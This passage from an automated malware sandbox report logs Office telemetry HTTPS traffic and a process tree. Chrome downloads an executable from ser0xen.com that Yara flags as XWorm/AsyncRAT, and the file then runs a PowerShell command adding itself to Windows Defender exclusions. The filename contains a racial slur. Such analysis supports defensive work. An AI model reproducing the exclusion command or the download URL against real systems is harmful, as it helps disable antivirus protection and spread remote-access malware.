                2024-10-07 01:27:07 UTC1372INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" /> <


                Session IDSource IPSource PortDestination IPDestination Port
                145192.168.2.44989213.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:07 UTC192OUTGET /rules/rule700901v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:07 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:07 GMT
                Content-Type: text/xml
                Content-Length: 1408
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                ETag: "0x8DC582BE1038EF2"
                x-ms-request-id: 626a0b0f-301e-006e-6de9-16f018000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012707Z-1657d5bbd48wd55zet5pcra0cg00000002ng00000000v04c
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:07 UTC1408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                Session IDSource IPSource PortDestination IPDestination Port
                146192.168.2.44989313.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:07 UTC192OUTGET /rules/rule700900v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:07 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:07 GMT
                Content-Type: text/xml
                Content-Length: 1371
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:28:06 GMT
                ETag: "0x8DC582BED3D048D"
                x-ms-request-id: d51e0a59-d01e-005a-6cfe-167fd9000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012707Z-1657d5bbd48tnj6wmberkg2xy800000002xg000000007q5g
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:07 UTC1371INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6f 66 69 6e 67 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700900" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProofing" S="Medium" /> <F


                Session IDSource IPSource PortDestination IPDestination Port
                147192.168.2.44989413.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:08 UTC192OUTGET /rules/rule702251v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:08 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:08 GMT
                Content-Type: text/xml
                Content-Length: 1389
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                ETag: "0x8DC582BE0F427E7"
                x-ms-request-id: de435f0b-f01e-0052-0101-179224000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012708Z-1657d5bbd48wd55zet5pcra0cg00000002vg000000001kv8
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:08 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="


                Session IDSource IPSource PortDestination IPDestination Port
                148192.168.2.44989513.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:08 UTC192OUTGET /rules/rule702250v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:08 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:08 GMT
                Content-Type: text/xml
                Content-Length: 1352
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                ETag: "0x8DC582BDD0A87E5"
                x-ms-request-id: a1812648-601e-0002-69fe-16a786000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012708Z-1657d5bbd487nf59mzf5b3gk8n00000002f000000000888u
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:08 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="Medium" /> <F T="2"> <O T


                Session IDSource IPSource PortDestination IPDestination Port
                149192.168.2.44989613.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:08 UTC192OUTGET /rules/rule702651v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:08 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:08 GMT
                Content-Type: text/xml
                Content-Length: 1395
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                ETag: "0x8DC582BDEC600CC"
                x-ms-request-id: 72218525-801e-002a-7701-1731dc000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012708Z-1657d5bbd48vlsxxpe15ac3q7n00000002pg00000000pwms
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:08 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 36 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 65 64 69 61 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 65 64 69
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702651" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Media.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMedi


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:21:25:44
                Start date:06/10/2024
                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                Imagebase:0x7ff76e190000
                File size:3'242'272 bytes
                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:false

                Target ID:2
                Start time:21:25:45
                Start date:06/10/2024
                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1976,i,9986206320547753570,420349288583730614,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Imagebase:0x7ff76e190000
                File size:3'242'272 bytes
                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:false

                Target ID:3
                Start time:21:25:48
                Start date:06/10/2024
                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://ser0xen.com/sucklemydicknigger.exe"
                Imagebase:0x7ff76e190000
                File size:3'242'272 bytes
                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                Target ID:4
                Start time:21:25:50
                Start date:06/10/2024
                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4872 --field-trial-handle=1976,i,9986206320547753570,420349288583730614,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Imagebase:0x7ff76e190000
                File size:3'242'272 bytes
                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                Target ID:8
                Start time:21:27:05
                Start date:06/10/2024
                Path:C:\Users\user\Downloads\sucklemydicknigger.exe
                Wow64 process (32bit):false
                Commandline:"C:\Users\user\Downloads\sucklemydicknigger.exe"
                Imagebase:0xf70000
                File size:39'424 bytes
                MD5 hash:49AA60A3EE7D3B03D16AA591024CBBC7
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000008.00000000.2482762861.0000000000F72000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000000.2482762861.0000000000F72000.00000002.00000001.01000000.00000006.sdmp, Author: ditekSHen
                Reputation:low
                Has exited:false

                Target ID:10
                Start time:21:27:09
                Start date:06/10/2024
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\sucklemydicknigger.exe'
                Imagebase:0x7ff788560000
                File size:452'608 bytes
                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                Target ID:11
                Start time:21:27:09
                Start date:06/10/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7699e0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:false

                No disassembly